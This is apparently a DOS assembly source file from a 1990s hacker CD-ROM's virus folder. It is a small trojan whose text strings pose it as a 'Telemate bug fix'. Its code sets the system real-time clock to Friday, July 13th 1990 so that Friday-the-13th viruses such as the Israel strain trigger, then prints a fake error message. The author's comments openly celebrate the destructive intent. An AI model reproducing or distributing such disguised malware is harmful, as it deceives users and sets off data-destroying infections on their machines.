home *** CD-ROM | disk | FTP | other *** search
/ Hacker 2 / HACKER2.mdf / virus / fri_13th.asm < prev    next >
Assembly Source File  |  1995-01-03  |  1KB  |  35 lines

  1. ;-------------------------------------------------------------------;
  2. ; Simple little program to change the date to July 13th, 1990        ;
  3. ; Which just happens to be a Friday...what a coincidence....        ;
  4. ; This should be great fun if you have a virus or a program that    ;
  5. ; goes *BOOM* on Friday the 13th, such as the Israel strain        ;
  6. ; Have fun, and remember, I'm not responsible if you get your lazy  ;
  7. ; ass busted while trying to bring down the damn Pentagon        ;
  8. ; Kryptic Night - SMC - RaCK - U<< - PhD                            ;
  9. ;-------------------------------------------------------------------;
  10. CODE    SEGMENT
  11.     Assume    CS:code,DS:code
  12.     ORG     100h
  13.  
  14. start:    Jmp begin
  15. text1    db    ' Telemate bug fix for version 3.0+$ '    ;Bogus filler text
  16. text2    db    ' TM.EXE fixed!$ '            ;Bogus filler text
  17. text3   db      07h,'Error! Cannot alter TM.EXE$ '    ;Printed after change
  18.  
  19. Begin    proc    NEAR
  20.     mov    ah,05h            ;Function 5 - Set Real Time Clock
  21.     mov    cx,1990h        ;What century
  22.     mov    dx,0713h        ;Month/day
  23.     int    1ah            ;Execute
  24.  
  25.  
  26.     mov    ah,09h            ;Funtion 9 - Print string <end in $>
  27.     lea    dx,text3        ;What text to print
  28.     int    21h            ;Execute function 09
  29.     int    20h            ;Quit .COM file
  30.     begin    endp
  31. CODE    ENDS                    ;End segment
  32.     END start                ;End program
  33.  
  34. Downloaded From P-80 International Information Systems 304-744-2253
  35.